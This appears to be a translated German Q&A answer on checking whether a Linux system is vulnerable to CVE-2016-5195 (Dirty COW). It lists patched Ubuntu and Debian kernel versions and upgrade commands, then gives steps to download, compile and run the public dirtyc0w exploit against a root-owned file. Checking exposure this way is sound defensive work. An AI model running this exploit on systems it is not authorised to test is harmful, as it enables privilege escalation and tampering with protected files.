Sie können uname -rv
tun um Ihre Linux-Kernel-Version herauszufinden. Sie erhalten eine Ausgabe ähnlich der folgenden:
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
Wenn Ihre Version älter als die folgende ist, sind Sie betroffen:
-
4.8.0-26.28 für Ubuntu 16.10
-
4.4.0-45.66 für Ubuntu 16.04 LTS
-
3.13.0-100.147 für Ubuntu 14.04 LTS
-
3.2.0-113.155 für Ubuntu 12.04 LTS
-
3.16.36-1+deb8u2 für Debian 8
-
3.2.82-1 für Debian 7
-
4.7.8-1 für Debian unstable
Laut security-tracker.debian müssen Sie uname -a
ausführen und überprüfen Sie Ihre aktuelle Kernel-Version .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
Diese Schwachstelle wird unter Debian gepatcht, indem Sie Ihr System aktualisieren:
apt-get update
apt-get upgrade
apt-get dist-upgrade
Bearbeiten
Wie kann ich sicherstellen, dass mein Betriebssystem nicht von CVE-2016-5195 betroffen ist?
Sie können das folgende Tutorial ausprobieren.
Laden Sie den Exploit herunter.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Als root:Erstellen Sie foo
Datei:
su
echo this is not a test > foo
Als Benutzer :
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Überprüfen Sie Ihre Datei:
cat foo
Auf anfälligen Rechnern erhalten Sie m00000000000000000
als Ausgabe.